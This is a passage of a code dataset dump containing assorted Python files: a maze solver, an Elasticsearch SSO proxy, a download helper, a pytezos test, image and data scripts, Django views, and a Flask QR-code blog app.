maze[newloc] & WALL_LEFT:\n raise WallHitError\n return newloc\n\n\ndef ends(maze):\n return numpy.asarray(numpy.where(maze & IS_TARGET)).T\n\n\nDIRS = {\n b'^': up,\n b'<': left,\n b'>': right,\n b'v': down,\n}\n\nANTIDIRS = {\n down: b'^',\n right: b'<',\n left: b'>',\n up: b'v'\n}\n\nUNREACHABLE = b' '\nTARGET = b'X'\n\n\ndef 
arrows_to_path(arrows, loc):\n if arrows[loc] == UNREACHABLE:\n raise ValueError('Cannot construct path for unreachable cell')\n path = [loc]\n\n nloc = loc\n while arrows[nloc] != TARGET:\n nloc = DIRS[arrows[nloc]](arrows, nloc, check_walls=False)\n path.append(nloc)\n\n return path\n\n\ndef smallest_dtype(value):\n for dtype in numpy.int8, numpy.int16, numpy.int32, numpy.int64:\n if dtype(value) == value:\n return dtype\n raise ValueError(f'Maze of size {value} is too big for NumPy to handle')\n\n\ndef flood(maze):\n if maze.ndim != 2 or not numpy.issubdtype(maze.dtype, numpy.integer):\n raise TypeError('maze must be a 2-dimensional array of integers')\n\n # Initialize everything as unreachable\n dtype = smallest_dtype(maze.size)\n distances = numpy.full(maze.shape, -1, dtype=dtype)\n directions = numpy.full(maze.shape, UNREACHABLE, dtype=('a', 1))\n\n jobs = queue.Queue()\n for end in ends(maze):\n end = tuple(end)\n directions[end] = TARGET\n distances[end] = 0\n jobs.put((end, 1))\n\n while not jobs.empty():\n loc, dist = jobs.get()\n for walk in [up, left, right, down]:\n try:\n newloc = walk(maze, loc)\n except HitError:\n pass\n else:\n # Been there better\n if 0 <= distances[newloc] <= dist:\n continue\n distances[newloc] = dist\n directions[newloc] = ANTIDIRS[walk]\n jobs.put((newloc, dist+1))\n\n return distances, directions\n\n\ndef is_reachable(directions):\n return UNREACHABLE not in directions\n\n\nclass AnalyzedMaze:\n def __init__(self, maze):\n self.maze = maze\n self.distances, self.directions = flood(maze)\n self.is_reachable = is_reachable(self.directions)\n\n def path(self, column, row):\n return arrows_to_path(self.directions, (column, row))\n\n\ndef analyze(maze):\n return AnalyzedMaze(maze)\n","sub_path":"edgemaze/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"439275684","text":"import asyncio\nimport logging\nimport os\nimport secrets\nimport sys\nimport urllib\n\nimport aiohttp\nfrom aiohttp import web\nfrom aiohttp_session import (\n get_session,\n session_middleware,\n)\nfrom aiohttp_session.redis_storage import RedisStorage\nimport aioredis\n\nfrom shared.logger import (\n get_root_logger,\n logged,\n)\nfrom shared.utils import (\n aws_auth_headers,\n get_common_config,\n normalise_environment,\n)\nfrom shared.web import (\n server_logger,\n authenticate_by_ip,\n)\n\nINCORRECT = 'Incorrect authentication credentials.'\n\n\nasync def run_application():\n logger = get_root_logger('elasticsearch-proxy')\n\n with logged(logger, 'Examining environment', []):\n env = normalise_environment(os.environ)\n port = env['PORT']\n ip_whitelist = env['INCOMING_IP_WHITELIST']\n staff_sso_client_base = env['STAFF_SSO_BASE']\n staff_sso_client_id = env['STAFF_SSO_CLIENT_ID']\n staff_sso_client_secret = env['STAFF_SSO_CLIENT_SECRET']\n es_endpoint, redis_uri, _ = get_common_config(env)\n\n client_session = aiohttp.ClientSession(skip_auto_headers=['Accept-Encoding'])\n\n async def handle(request):\n url = request.url.with_scheme(es_endpoint['protocol']) \\\n .with_host(es_endpoint['host']) \\\n .with_port(int(es_endpoint['port']))\n request_body = await request.read()\n source_headers = {\n header: request.headers[header]\n for header in ['Kbn-Version', 'Content-Type']\n if header in request.headers\n }\n auth_headers = aws_auth_headers(\n 'es', es_endpoint, request.method, request.path,\n dict(request.query), source_headers, request_body,\n )\n\n 
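        # the SigV4-style headers computed above sign this exact method/path/query/body,
        # so the proxied request is replayed verbatim against the ES endpoint and the
        # upstream status/body/headers are mirrored back to the client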
with logged(\n request['logger'], 'Elasticsearch request by (%s)/(%s) to (%s) (%s) (%s)', [\n request['me_profile']['email'], es_endpoint['access_key_id'],\n request.method, str(url), request_body,\n ],\n ):\n async with client_session.request(\n request.method, str(url), data=request_body,\n headers={**source_headers, **auth_headers}\n ) as response:\n response_body = await response.read()\n\n return web.Response(status=response.status, body=response_body, headers=response.headers)\n\n redis_pool = await aioredis.create_pool(redis_uri)\n redis_storage = RedisStorage(redis_pool, max_age=60*60*24)\n\n with logged(logger, 'Creating listening web application', []):\n app = web.Application(middlewares=[\n server_logger(logger),\n authenticate_by_ip(INCORRECT, ip_whitelist),\n session_middleware(redis_storage),\n authenticate_by_staff_sso(client_session, staff_sso_client_base,\n staff_sso_client_id, staff_sso_client_secret),\n ])\n\n app.add_routes([\n web.delete(r'/{path:.*}', handle),\n web.get(r'/{path:.*}', handle),\n web.post(r'/{path:.*}', handle),\n web.put(r'/{path:.*}', handle),\n web.head(r'/{path:.*}', handle),\n ])\n\n class NullAccessLogger(aiohttp.abc.AbstractAccessLogger):\n # pylint: disable=too-few-public-methods\n\n def log(self, request, response, time):\n pass\n\n runner = web.AppRunner(app, access_log_class=NullAccessLogger)\n await runner.setup()\n site = web.TCPSite(runner, '0.0.0.0', port)\n await site.start()\n\n\ndef authenticate_by_staff_sso(client_session, base, client_id, client_secret):\n\n auth_path = '/o/authorize/'\n token_path = '/o/token/'\n me_path = '/api/v1/user/me/'\n grant_type = 'authorization_code'\n scope = 'read write'\n response_type = 'code'\n\n redirect_from_sso_path = '/__redirect_from_sso'\n session_token_key = 'staff_sso_access_token'\n\n def get_redirect_uri_authenticate(session, request):\n state = secrets.token_urlsafe(32)\n set_redirect_uri_final(session, state, request)\n redirect_uri_callback = urllib.parse.quote(get_redirect_uri_callback(request), safe='')\n return f'{base}{auth_path}?' 
\\\n               f'scope={scope}&state={state}&' \\\n               f'redirect_uri={redirect_uri_callback}&' \\\n               f'response_type={response_type}&' \\\n               f'client_id={client_id}'\n\n    def get_redirect_uri_callback(request):\n        uri = request.url.with_scheme(request.headers['X-Forwarded-Proto']) \\\n            .with_path(redirect_from_sso_path) \\\n            .with_query({})\n        return str(uri)\n\n    def set_redirect_uri_final(session, state, request):\n        session[state] = str(request.url)\n\n    def get_redirect_uri_final(session, request):\n        state = request.query['state']\n        return session[state]\n\n    @web.middleware\n    async def _authenticate_by_sso(request, handler):\n        session = await get_session(request)\n\n        if request.path != redirect_from_sso_path and session_token_key not in session:\n            return web.Response(status=302, headers={\n                'Location': get_redirect_uri_authenticate(session, request),\n            })\n\n        if request.path == redirect_from_sso_path:\n            code = request.query['code']\n            redirect_uri_final = get_redirect_uri_final(session, request)\n            sso_response = await client_session.post(\n                f'{base}{token_path}',\n                data={\n                    'grant_type': grant_type,\n                    'code': code,\n                    'client_id': client_id,\n                    'client_secret': client_secret,\n                    'redirect_uri': get_redirect_uri_callback(request),\n                },\n            )\n            session[session_token_key] = (await sso_response.json())['access_token']\n            return web.Response(status=302, headers={'Location': redirect_uri_final})\n\n        token = session[session_token_key]\n        async with client_session.get(f'{base}{me_path}', headers={\n            'Authorization': f'Bearer {token}'\n        }) as me_response:\n            me_profile = await me_response.json()\n\n        request['me_profile'] = me_profile\n        return \\\n            await handler(request) if me_response.status == 200 else \\\n            web.Response(status=302, headers={\n                'Location': get_redirect_uri_authenticate(session, request),\n            })\n\n    return _authenticate_by_sso\n\n\ndef main():\n    stdout_handler = logging.StreamHandler(sys.stdout)\n    app_logger = logging.getLogger('activity-stream')\n    app_logger.setLevel(logging.DEBUG)\n    app_logger.addHandler(stdout_handler)\n\n    loop = asyncio.get_event_loop()\n    loop.create_task(run_application())\n    loop.run_forever()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"elasticsearch_proxy/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"550845788","text":"#!/usr/bin/env python3\nimport os\nfrom logging import Logger\n\nimport log\nimport requests\n\nDEFAULT_LOGGER: Logger = log.create_default_logger()\n\n\ndef main():\n    logger = DEFAULT_LOGGER\n\n    remote_url = os.sys.argv[1]\n    local_file = os.sys.argv[2]\n\n    logger.info(f\"Download {remote_url}\")\n\n    response = requests.get(remote_url)\n\n    with open(local_file, \"wb\") as f:\n        logger.info(f\"Save response as {local_file}\")\n        f.write(response.content)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"roles/vscode/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"127956532","text":"from unittest import TestCase\n\nfrom tests import get_data\nfrom pytezos.operation.forge import forge_operation_group\n\n\nclass OperationForgingTestooFDEN(TestCase):\n\n    def setUp(self):\n        self.maxDiff = None\n    \n    def test_forge_ooFDEN(self):\n        expected = get_data(\n            path='operations/ooFDENTDXmm2TMUugi3B8J93tprk3qRJajD9Djw2ESamNuCbZod/forged.hex')\n        actual = forge_operation_group(get_data(\n            
path='operations/ooFDENTDXmm2TMUugi3B8J93tprk3qRJajD9Djw2ESamNuCbZod/unsigned.json'))\n        self.assertEqual(expected, actual)\n","sub_path":"tests/operations/ooFDENTDXmm2TMUugi3B8J93tprk3qRJajD9Djw2ESamNuCbZod/test_forge_ooFDEN.py","file_name":"test_forge_ooFDEN.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"372518749","text":"import numpy as np\n\nimport matplotlib.pyplot as plt\nimport math\nimport cv2\nimport sys\n\n\n\ndef main():\n\timg=cv2.imread(sys.argv[1])\n\trows, cols, channels = img.shape\n\trow4=int(rows/2)\n\tcol4=int(cols/2)\n\t# use an object array so string labels such as \"01\" keep their leading zeros\n\tlabels=np.empty((2,2), dtype=object)\n\n\tfor i in range(2):\n\t\tfor j in range(2):\n\t\t\tnew = img[i*row4:(i+1)*row4, j*col4:(j+1)*col4]\n\t\t\tcv2.imwrite(\"single\"+str(i)+str(j)+\".jpg\", new)\n\t\t\tlabel=str(i)+str(j)\n\t\t\tlabels[i][j]=label\n\n\tprint(labels)\n\nmain()","sub_path":"rmrc/scripts/cropper.py","file_name":"cropper.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"4695169","text":"# -*- encoding:utf-8 -*-\n\"\"\"\n    Global environment configuration module\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport re\nimport platform\nimport sys\nimport warnings\nfrom enum import Enum\nfrom os import path\n\nimport numpy as np\nimport pandas as pd\n\n__author__ = '阿布'\n__weixin__ = 'abu_quant'\n\n\"\"\"Only windows and mac os are supported for now; anything that is not windows is treated as mac os (Darwin is not used for the check); not fully tested on linux\"\"\"\ng_is_mac_os = platform.system().lower().find(\"windows\") < 0 and sys.platform != \"win32\"\n\"\"\"Main process pid; when running in parallel, ABuEnvProcess copies the modules registered in the main process, so g_main_pid can be used to check whether we are in the main process\"\"\"\ng_main_pid = os.getpid()\ng_cpu_cnt = os.cpu_count()\n\"\"\"make pandas ignore chained-assignment warnings\"\"\"\npd.options.mode.chained_assignment = None\n\"\"\"numpy/pandas display control, enabled by default\"\"\"\ng_display_control = True\nif g_display_control:\n    # maximum number of rows displayed for a pandas DataFrame\n    pd.options.display.max_rows = 20\n    # maximum number of columns displayed for a pandas DataFrame\n    pd.options.display.max_columns = 20\n    # pandas shows floats with 4 digits of precision\n    pd.options.display.precision = 4\n    # numpy shows floats with 4 digits of precision, without scientific notation\n    np.set_printoptions(precision=4, suppress=True)\n\n\"\"\"ignore all warnings, disabled by default\"\"\"\ng_ignore_all_warnings = False\n\"\"\"ignore library warnings, enabled by default\"\"\"\ng_ignore_lib_warnings = True\nif g_ignore_lib_warnings:\n    # noinspection PyBroadException\n    try:\n        import matplotlib\n\n        matplotlib.warnings.filterwarnings('ignore')\n        matplotlib.warnings.simplefilter('ignore')\n        import sklearn\n\n        sklearn.warnings.filterwarnings('ignore')\n        sklearn.warnings.simplefilter('ignore')\n    except:\n        pass\nif g_ignore_all_warnings:\n    warnings.filterwarnings('ignore')\n    warnings.simplefilter('ignore')\n\n# ******************** data directories start ****************\n\"\"\"\n    abu root file directory\n    on windows use a drive with plenty of free disk space, e.g.: d://, e:/, f:///\n\n    eg:\n        root_drive = 'd://'\n        root_drive = 'e://'\n        root_drive = 'f://'\n\"\"\"\nroot_drive = path.expanduser('~')\n\"\"\"main abu data cache directory\"\"\"\ng_project_root = path.join(root_drive, 'abu')\n\"\"\"abu data directory ~/abu/data\"\"\"\ng_project_data_dir = path.join(g_project_root, 'data')\n\"\"\"abu log directory ~/abu/log\"\"\"\ng_project_log_dir = path.join(g_project_root, 'log')\n\"\"\"abu database directory ~/abu/db\"\"\"\ng_project_db_dir = path.join(g_project_root, 'db')\n\"\"\"abu cache directory ~/abu/cache\"\"\"\ng_project_cache_dir = path.join(g_project_data_dir, 'cache')\n\"\"\"main abu project data directory, i.e. the location of RomDataBu inside the project\"\"\"\ng_project_rom_data_dir = path.join(path.dirname(path.abspath(path.realpath(__file__))), '../RomDataBu')\n\n\"\"\"abu log file ~/abu/log/info.log\"\"\"\ng_project_log_info = path.join(g_project_log_dir, 'info.log')\n\n\"\"\"path of the hdf5 file used to store financial time series\"\"\"\ng_project_kl_df_data = path.join(g_project_data_dir, 'df_kl.h5')\n\n_p_dir = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.path.pardir))\n\n\n# ******************** logging start ****************\n# TODO move the logging setup out of env\ndef init_logging():\n    \"\"\"\n    logging initialization: configure the log level, the default file path and the output format\n    \"\"\"\n    if not os.path.exists(g_project_log_dir):\n        # create the log directory\n        os.makedirs(g_project_log_dir)\n\n    # output format specification\n    # file_handler = logging.FileHandler(g_project_log_info, 'a', 'utf-8')\n    logging.basicConfig(level=logging.DEBUG,\n                        format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n                        datefmt='%a, %d %b %Y %H:%M:%S',\n                        filename=g_project_log_info,\n                        filemode='a'\n                        # handlers=[file_handler]\n                        )\n\n    console = logging.StreamHandler()\n    console.setLevel(logging.INFO)\n    # console output only shows the message itself\n    formatter = logging.Formatter('%(message)s')\n    console.setFormatter(formatter)\n    logging.getLogger('').addHandler(console)\n\n\ninit_logging()\n\n# ******************** logging end ****************\n\ng_plt_figsize = (14, 7)\n\n\ndef init_plot_set():\n    \"\"\"global plot settings\"\"\"\n    import seaborn as sns\n    sns.set_context('notebook', rc={'figure.figsize': g_plt_figsize})\n    sns.set_style(\"darkgrid\")\n\n    import matplotlib\n    # since conda 5.0 the matplotlib figure size must be set separately, otherwise the pandas plot size does not take effect\n    matplotlib.rcParams['figure.figsize'] = g_plt_figsize\n\n\ninit_plot_set()\n","sub_path":"common/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"343748775","text":"from peewee import *\nfrom os import path\nROOT = path.dirname(path.realpath(__file__))\ndb = SqliteDatabase(path.join(ROOT, \"activities.db\"))\n\nclass Activity(Model):\n    name = CharField()\n    desc = CharField()\n    location = CharField()\n    class Meta:\n        database = db\nActivity.create_table(fail_silently=True)\n\nActivity.create(name=\"Water Day\", desc=\"Celebrating Water Diving\",location=\"Nanyuki\")\nActivity.create(name=\"Running\", desc=\"Eldoret Marathon\",location=\"Eldoret\")\nActivity.create(name=\"Running\", desc=\"Eldoret Marathon\",location=\"Eldoret\")","sub_path":"King_System/activities.py","file_name":"activities.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"166704366","text":"#! 
/usr/bin/python\n# https://adventofcode.com/2018/day/2\n\nfrom collections import defaultdict\n\n# read input\ninfile = open(\"input\",\"r\")\ninlist = []\nwhile True:\n # read line and strip newline characters\n instr = infile.readline().rstrip(\"\\r\\n\")\n\n if instr == '': # eof\n break\n\n inlist.append(instr)\ninfile.close()\n\ntwos = 0\nthrees = 0\n\nfor ID in inlist:\n isTwos = False\n isThrees = False\n\n # default dict to store letter frequencies\n freq = defaultdict(int)\n for c in ID:\n # increment freq of char if it exists\n freq[c] += 1\n for c in freq:\n if freq[c] == 2 and not isTwos:\n twos += 1\n isTwos = True\n if freq[c] == 3 and not isThrees:\n threes += 1\n isThrees = True\n\nchecksum = twos * threes\n\n# write solution\nofile= open(\"output1\",\"w\")\nofile.write(str(checksum))\nofile.close()\n","sub_path":"02/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"609354396","text":"from django.shortcuts import render\nfrom mealmanageapp.models import Event,Store\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\n\n# Create your views here.\n\ndef detail(request):\n context = {}\n event_all = Event.objects.order_by('-date')\n paginator = Paginator(event_all,5)\n page = request.GET.get('page')\n try:\n event_list = paginator.page(page)\n except PageNotAnInteger:\n event_list = paginator.page(1)\n except EmptyPage:\n event_list = paginator.page(paginator.num_pages)\n\n context['event_list'] = event_list\n return render(request,'detail.html',context)\n\n\ndef exhaustive(request,page_num):\n context = {}\n event_list = Event.objects.filter(id=page_num)\n context['event_list'] = event_list\n for i in event_list:\n if i.staus == 'producing':\n return render(request,'producting.html',context)\n if i.staus == 'selling':\n return render(request,'selling.html',context)\n if i.staus == 'transporting':\n return render(request,'transporting.html',context)\n else:\n pass\n\ndef count(request):\n context = {}\n producing_list = Event.objects.filter(staus='producing')\n selling_list = Event.objects.filter(staus='selling')\n transporting_list = Event.objects.filter(staus='transporting')\n store_list = Store.objects.all()\n\n producing_cost = 0\n producing_amount = 0\n producing_yuanwei = 0\n producing_yexiang = 0\n producing_lemon = 0\n producing_coco = 0\n producing_lanmei = 0\n for i in producing_list:\n producing_cost = producing_cost + i.money\n producing_amount = producing_amount + i.numbers_in_real\n producing_yuanwei = producing_yuanwei + i.yuanwei\n producing_yexiang = producing_yexiang + i.yexiang\n producing_lanmei = producing_lanmei + i.lanmei\n producing_lemon = producing_lemon + i.lemon\n producing_coco = producing_coco + i.coco\n\n selling_get = 0\n selling_amount = 0\n selling_yuanwei = 0\n selling_yexiang = 0\n selling_lemon = 0\n selling_coco = 0\n selling_lanmei = 0\n for i in selling_list:\n selling_get = selling_get + i.money\n selling_amount = selling_amount + i.numbers_in_real\n selling_yuanwei = selling_yuanwei + i.yuanwei\n selling_yexiang = selling_yexiang + i.yexiang\n selling_lanmei = selling_lanmei + i.lanmei\n selling_lemon = selling_lemon + i.lemon\n selling_coco = selling_coco + i.coco\n\n transporting_cost = 0\n transporting_amount = 0\n transporting_yuanwei = 0\n transporting_yexiang = 0\n transporting_lemon = 0\n transporting_coco = 0\n transporting_lanmei = 0\n for i in transporting_list:\n transporting_cost = 
transporting_cost + i.money\n transporting_amount = transporting_amount + i.numbers_in_real\n transporting_yuanwei = transporting_yuanwei + i.yuanwei\n transporting_yexiang = transporting_yexiang + i.yexiang\n transporting_lanmei = transporting_lanmei + i.lanmei\n transporting_lemon = transporting_lemon + i.lemon\n transporting_coco = transporting_coco + i.coco\n\n context['cost'] = producing_cost + transporting_cost\n context['selling_get'] = selling_get\n context['producing_amount'] = producing_amount\n context['selling_amount'] = selling_amount\n\n for i in store_list:\n context['level_one'] = i.level_one\n context['level_two'] = i.level_two\n context['yuanwei'] = i.yuanwei\n context['yexiang'] = i.yexiang\n context['coco'] = i.coco\n context['lemon'] = i.lemon\n context['lanmei'] = i.lanmei\n\n return render(request,'count.html',context)","sub_path":"mealmanageapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"140720464","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport openpyxl as opxl\n\n# path = input(\"Enter path to .tot files: \")\n\npath = r\"J:\\500am - M12 Overarching Hydrology\\Calcs\\RAFTS\\RAFTS Files\\Kemps Creek\"\n\n# Select only .tot files in the list\ndir_list = [n for n in os.listdir(path) if \".tot\" in n]\nos.chdir(path)\n\n# Sort the list first storm burst, then duration, then AEP.\ndir_list.sort(key=lambda x: int(x[x.find(\"TP\")+2:x.find(\".\")]))\ndir_list.sort(key=lambda x: int(x[x.find(\"_\")+1:x.find(\"min\")]))\ndir_list.sort(key=lambda x: float(x[0:x.find(\"%\")].replace(\"pt\",\".\")))\n\n# Create a dictionary to store all the data\nall_data = {}\n\n# Loop through list and identify the AEP, duration and storm burst number\nfor file in dir_list:\n\taep = file.split(\"_\")[0]\n\tdur = file.split(\"_\")[1]\n\tburst = file.split(\"_\")[2][:-4]\n\n\t''' Open the file and read only the lines storing flow data and call it 'data'\n\tAssumes only one storm per file (i.e. 1%, 6hr, Storm burst 1) \n\t'''\n\twith open(file, 'r') as f:\n\t\t# read all of the data in the text file bar the first line.\n\t\tdata = f.readlines()[1:]\n\t\t''' Loop through 'data' and turn each line that is 101 characters in length\n\t\tinto a list of floats. Every row that contains flow data is 101 characters\n\t\tlong. Once the data is put into one long series, the length of all the data\n\t\twill be split into divisions depending on how many catchments there are. This\n\t\tsaves having to tell python where each new block starts.\n\t\tAlso initialize a list called catchments which will store all of the catchment\n\t\tnames within the .tot file.\n\t\t'''\n\t\tseries = np.array([])\n\t\tcatchments = []\n\t\tfor line in data:\n\t\t\tif len(line) == 101:\n\t\t\t\tline = [float(n) for n in line.split()]\n\t\t\t\t# Flatten the list of lists into one long list.\n\t\t\t\tseries = np.append(series, line)\n\t\t\telse:\n\t\t\t\t# Append the name of the catchment to the catchments list\n\t\t\t\tcatchments.append(line.split()[-1])\n\n\t\t\"\"\" The length of each block of data for each subcatchment should be \n\t\tthe entire length of the series divided by the number of catchments in the\n\t\tfile.\n\t\t\"\"\"\n\t\tsubseries_length = len(series) / len(catchments)\n\n\t\t''' Try to write to the dictionary 'all_data' under the appropriate\n\t\t\tkey. 
If a KeyError occurs then create the key.\n\t\t'''\n\t\tfor i, catch in enumerate(catchments):\n\t\t\tsubseries = series[int(i*subseries_length) : int((i+1)*subseries_length)]\n\t\t\ttry:\n\t\t\t\tall_data[catch][aep][dur][burst] = {}\n\t\t\t\tall_data[catch][aep][dur][burst][\"hydrograph\"] = subseries\n\t\t\t\tall_data[catch][aep][dur][burst][\"max\"] = np.amax(subseries)\n\t\t\texcept KeyError:\n\t\t\t\ttry:\n\t\t\t\t\tall_data[catch][aep][dur] = {}\n\t\t\t\t\tall_data[catch][aep][dur][burst] = {}\n\t\t\t\t\tall_data[catch][aep][dur][burst][\"hydrograph\"] = subseries\n\t\t\t\t\tall_data[catch][aep][dur][burst][\"max\"] = np.amax(subseries)\n\t\t\t\texcept KeyError:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tall_data[catch][aep] = {}\n\t\t\t\t\t\tall_data[catch][aep][dur] = {}\n\t\t\t\t\t\tall_data[catch][aep][dur][burst] = {}\n\t\t\t\t\t\tall_data[catch][aep][dur][burst][\"hydrograph\"] = subseries\n\t\t\t\t\t\tall_data[catch][aep][dur][burst][\"max\"] = np.amax(subseries)\n\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\tall_data[catch] = {}\n\t\t\t\t\t\tall_data[catch][aep] = {}\n\t\t\t\t\t\tall_data[catch][aep][dur] = {}\n\t\t\t\t\t\tall_data[catch][aep][dur][burst] = {}\n\t\t\t\t\t\tall_data[catch][aep][dur][burst][\"hydrograph\"] = subseries\n\t\t\t\t\t\tall_data[catch][aep][dur][burst][\"max\"] = np.amax(subseries)\n\n# catch = '1.16D'\n# aep = '1%AEP'\n# burst = 'TP1'\n# for duration in all_data[catch][aep]:\n# \tprint(duration)\n# \tplt.figure()\n# \tplt.plot(all_data[catch][aep][duration][burst][\"hydrograph\"])\n# \tplt.xlabel(\"Time (mins)\")\n# \tplt.ylabel(\"Flow (m3/s)\")\n# \tplt.title(\"Catchment {} - {} {} {}\".format(catch, aep, duration, burst))\n# \tplt.show()\n\nfor catch in all_data:\n\tworkbook = opxl.Workbook()\n\tfor aep in all_data[catch]:\n\t\tworkbook.create_sheet(aep)\n\t\tsheet = workbook[aep]\n\t\tfor i, dur in enumerate(all_data[catch][aep]):\n\t\t\tfor j, burst in enumerate(all_data[catch][aep][dur], start=1):\n\t\t\t\tfor k, n in enumerate(all_data[catch][aep][dur][burst][\"hydrograph\"], start=2):\n\t\t\t\t\tsheet[\"\".join([opxl.utils.cell.get_column_letter(i*10+j), str(k)])] = n\n\n\n\n\n# for catch in all_data:\n# \tworkbook = opxl.Workbook()\n# \tfor aep in all_data[catch]:\n# \t\tworkbook.create_sheet(aep)\n# \t\tsheet = workbook[aep]\n# \t\tfor i, dur in enumerate(all_data[catch][aep]):\n# \t\t\tfor j, burst in enumerate(all_data[catch][aep][dur]):\n# \t\t\t\tfor n in all_data[catch][aep][dur][burst]['hydrograph']:\n#                     sheet[\"\".join([opxl.utils.cell.get_column_letter(i*10+1), str(1)])] = 1\n\t\t\t\t\n\n# \tworkbook.save(\"Catchment {} Workbook.xlsx\".format(catch))\n\n\n\n","sub_path":"RAFTS/analyse_storm_injector_tot_output_002.py","file_name":"analyse_storm_injector_tot_output_002.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"629721967","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\"\"\"\n@author:GT\n@file:classops.py\n@time:1/3/201811:38 AM\n\"\"\"\nclass Student(object):\n    __slots__ = ('name','age','score')\n    def get_score(self):\n        return self.score\n    def set_score(self,value):\n        if not isinstance(value, int):\n            raise ValueError('score must be int')\n        # 'or', not 'and': a value can never be both below 0 and above 100\n        if value < 0 or value > 100:\n            raise ValueError('score should be between 0 - 100')\n        # store on self.score so it matches __slots__ and get_score\n        self.score = value","sub_path":"Classops/classops.py","file_name":"classops.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
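The RAFTS record above builds each level of the nested `all_data` dict by catching `KeyError` three levels deep. Python's `dict.setdefault` expresses the same "create the key on first miss" idea without the nested try/except ladder. A minimal sketch, assuming the same `catch`/`aep`/`dur`/`burst` nesting as the record (the `store` helper name is made up for illustration):

```python
import numpy as np

def store(all_data, catch, aep, dur, burst, subseries):
    # setdefault returns the existing sub-dict or installs a fresh one,
    # walking/creating one nesting level per call
    leaf = (all_data.setdefault(catch, {})
                    .setdefault(aep, {})
                    .setdefault(dur, {}))
    leaf[burst] = {"hydrograph": subseries, "max": np.amax(subseries)}

all_data = {}
store(all_data, "1.16D", "1%AEP", "360min", "TP1", np.array([0.0, 2.5, 1.0]))
print(all_data["1.16D"]["1%AEP"]["360min"]["TP1"]["max"])  # 2.5
```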
+{"seq_id":"138554069","text":"import os\nimport yaml\nimport glob\nfrom flask import Flask, render_template, flash, session, request, redirect\nfrom flask_bootstrap import Bootstrap\nfrom flask_mysqldb import MySQL\nfrom flask_ckeditor import CKEditor\nfrom flask_table import Table, Col\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom qrcode_project import create_qr, read_qr\nfrom get_image import get_image\n\napp = Flask(__name__)\nBootstrap(app)\nCKEditor(app)\n\n#configure db\ndb = yaml.load(open('db.yaml'))\napp.config['MYSQL_HOST'] = db['mysql_host']\napp.config['MYSQL_USER'] = db['mysql_user']\napp.config['MYSQL_PASSWORD'] = db['mysql_password']\napp.config['MYSQL_DB'] = db['mysql_db']\napp.config['MYSQL_CURSORCLASS'] = 'DictCursor'\nmysql = MySQL(app)\n\napp.config['SECRET_KEY'] = os.urandom(24)\n\nQRCODE_FOLDER = os.path.join('static', 'qrcodes')\napp.config['UPLOAD_FOLDER'] = QRCODE_FOLDER\n\n@app.route('/')\ndef index():\n cur = mysql.connection.cursor()\n resultValue = cur.execute(\"SELECT * from blog\")\n if resultValue > 0:\n blogs = cur.fetchall()\n cur.close()\n return render_template('index.html', blogs=blogs)\n cur.close()\n return render_template('index.html', blogs=None)\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n@app.route('/projects')\ndef projects():\n return render_template('projects.html')\n\n@app.route('/qr-code-project', methods=['GET', 'POST'])\ndef qr_code_project():\n if request.method == 'POST':\n requestDelete = request.form\n os.remove(os.path.join('static/qrcodes/',requestDelete['delete']))\n image_files = get_image(QRCODE_FOLDER)\n print(image_files)\n return render_template('qr-code-project.html', qr_images=image_files)\n\n@app.route('/generate-qr', methods=['GET','POST'])\ndef generate_qr():\n if request.method == 'POST':\n userDetails = request.form\n qrcode_image = create_qr(str(userDetails['order_number']))\n address = \"static/qrcodes/\" + str(userDetails['order_number']) + \".png\"\n qrcode_image.save(address)\n qr_image = \"qrcodes/\" + str(userDetails['order_number']) + \".png\"\n flash(\"Successfully generated QRCode!\", 'success')\n return render_template('generate-qr.html', qrcode_image=qr_image)\n return render_template('generate-qr.html', qrcode_image=None)\n\n@app.route('/read-qr', methods=['GET','POST'])\ndef read_qr():\n if request.method == 'POST':\n flash(\"Successfully generated QRCode!\", 'success')\n return render_template('read-qr.html')\n\n@app.route('/view-qr/')\ndef view_qr(id):\n cur = mysql.connection.cursor()\n results = cur.execute(\"SELECT orders.itemNumber, items.itemName, items.itemDescription, orders.quantity FROM madnoyz.orders as orders INNER JOIN madnoyz.items as items ON items.itemId = orders.itemNumber WHERE orders.poNumber = %s\", ([id]))\n if results > 